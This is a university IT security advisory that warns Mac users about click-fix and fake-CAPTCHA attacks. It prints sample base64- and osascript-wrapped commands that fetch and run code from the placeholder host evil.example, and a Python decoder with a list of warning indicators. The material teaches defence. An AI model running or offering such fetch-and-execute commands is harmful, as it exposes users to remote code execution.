SDU IT
Mac User: How to Avoid Click-Fix Attacks
SDU IT is seeing an increasing number of so-called click-fix attacks targeting macOS users at the university. These attacks try to trick you into performing harmful actions under the guise of "solving a problem."
Typical patterns to be aware of:
- Pop-ups or websites claiming that your Mac is infected and urging you to “fix the issue”
- Instructions to open Terminal.app and paste (copy/paste) commands
- Scripts disguised as “security updates” or “certificate fixes”
- Use of AppleScript via osascript to execute hidden commands
- Long, opaque strings (often base64-encoded), like this one:
  SmVnIGVyIGVuIGJhc2U2NCBlbmtvZGV0IHN0cmVuZywgc29tIHNrYWwgZsOlIGRpZyB0aWwgYXQgdHJvIGF0IGFsdCBlciBmcmVkIG9nIGluZ2VuIGZhcmUsIGltZW5zIGplZyBzdGrDpmxlciBhbGxlIGRpbmUgZGF0YQo
Example of a click-fix-like pattern (base64):
You may be asked to insert the following into Terminal:
echo "ZWNobyAiSGVudGVyIG9nIGtcdTAwZjhyZXIgZWtzdGVybiBrb2RlIiAmJiBjdXJsIC1zIGh0dHBzOi8vZXZpbC5leGFtcGxlL3NjcmlwdC5zaCB8IGJhc2g=" | base64 --decode | bash
After decoding:
echo "Fetching and executing external code" && curl -s https://evil.example/script.sh | bash
What does it do?
- Displays a harmless message
- Fetches code from the internet
- Executes it directly on your machine
Example of an AppleScript-based attack using the osascript command:
You may be asked to run:
osascript -e 'do shell script "curl -s https://evil.example/payload.sh | bash"'
Variation combining the two tactics from before:
osascript -e 'do shell script (do shell script "echo Y3VybCAtcyBodHRwczovL2V2aWwuZXhhbXBsZS9wYXlsb2FkLnNoIHwgYmFzaA== | base64 --decode")'
After decoding:
curl -s https://evil.example/payload.sh | bash
What does this type of command do?
- Uses AppleScript (osascript) to execute shell commands
- Can bypass user expectations (it doesn’t look like a “classic” Terminal command)
- Fetches and executes external code – often hidden via encoding
- In some cases, can trigger system dialogs or run with elevated privileges depending on the context
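As an added illustration (not part of SDU IT's guidance), the following Python script does what a cautious user should do before pasting anything: it decodes the hidden base64 layers of a command without executing it and lists the warning signs it contains. The two sample commands are the ones shown above; evil.example is the page's placeholder domain.

```python
import base64
import re

# Constructed samples: the two commands from the examples above (evil.example is the page's placeholder host).
SAMPLE_BASE64_CMD = (
    'echo "ZWNobyAiSGVudGVyIG9nIGtcdTAwZjhyZXIgZWtzdGVybiBrb2RlIiAmJiBjdXJs'
    'IC1zIGh0dHBzOi8vZXZpbC5leGFtcGxlL3NjcmlwdC5zaCB8IGJhc2g=" | base64 --decode | bash'
)
SAMPLE_OSASCRIPT_CMD = (
    "osascript -e 'do shell script (do shell script \"echo "
    "Y3VybCAtcyBodHRwczovL2V2aWwuZXhhbXBsZS9wYXlsb2FkLnNoIHwgYmFzaA=="
    " | base64 --decode\")'"
)

B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")  # base64 runs long enough to be worth decoding

# Substrings that mark a "fix" as fetching or hiding code, with the reason to report.
INDICATORS = {
    "base64 --decode": "decodes hidden content at run time",
    "base64 -d": "decodes hidden content at run time",
    "| bash": "pipes downloaded text straight into a shell",
    "| sh": "pipes downloaded text straight into a shell",
    "curl ": "downloads from the internet",
    "osascript": "runs shell commands via AppleScript",
}

def decode_layers(text, max_depth=5):
    """Replace every base64 token in text with its decoding, repeating
    until nothing decodes any more, so nested encodings are unwrapped too."""
    for _ in range(max_depth):
        changed = False
        for token in B64_TOKEN.findall(text):
            try:
                plain = base64.b64decode(token, validate=True).decode("utf-8")
            except (ValueError, UnicodeDecodeError):
                continue  # not real base64 (or not text): leave it untouched
            text = text.replace(token, plain)
            changed = True
        if not changed:
            break
    return text

def inspect_command(cmd):
    """Reveal what a pasted command would do, without executing any part of it."""
    revealed = decode_layers(cmd)
    reasons = sorted({why for key, why in INDICATORS.items() if key in revealed})
    return {"revealed": revealed, "indicators": reasons, "suspicious": bool(reasons)}
```

Call `inspect_command()` on the exact text you were asked to paste; the `revealed` field shows the command as the shell would eventually see it, and `indicators` explains why it is a warning sign.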
Example of an attack based on the misuse of CAPTCHA verification
We also observe attacks where well-known CAPTCHA mechanisms (“Verify that you are not a robot”) are misused as bait.
This is how it might look:
- A pop-up or website displays a CAPTCHA
- After “verification,” the user receives instructions such as: “To complete the security check, copy and paste the following command into Terminal”
- The command often resembles the above examples (base64 or osascript)
What is the issue?
CAPTCHA is a familiar and trustworthy pattern, typically used legitimately. Attackers exploit this familiarity to make the action appear safe and necessary. In reality, there is no legitimate connection between a CAPTCHA verification and the need to execute commands on your own computer.
Important to remember:
- CAPTCHA never requires you to open Terminal or execute commands
- Any instruction combining “verification” with local command execution is a clear warning sign
Warning signs:
If such actions were legitimate, there would be no reason to hide the actual commands or their purpose behind base64 or similar obfuscation. A lack of transparency is a strong warning sign.
SDU’s recommendation:
- Never execute commands you do not fully understand
- Avoid running commands with hidden or encoded content
- Be particularly skeptical of osascript commands from external sources
- Do not trust instructions from random websites or pop-ups
- Contact SDU IT Support if you are in doubt - better to ask one time too many than one time too few!
If you encounter anything suspicious, contact us immediately via phone, email, or at https://service.sdu.dk.
Do you have any questions?
If your query isn’t urgent, feel free to create a support ticket.
We will get back to you as soon as possible.
Phone: 6550 2990
Email: servicedesk@sdu.dk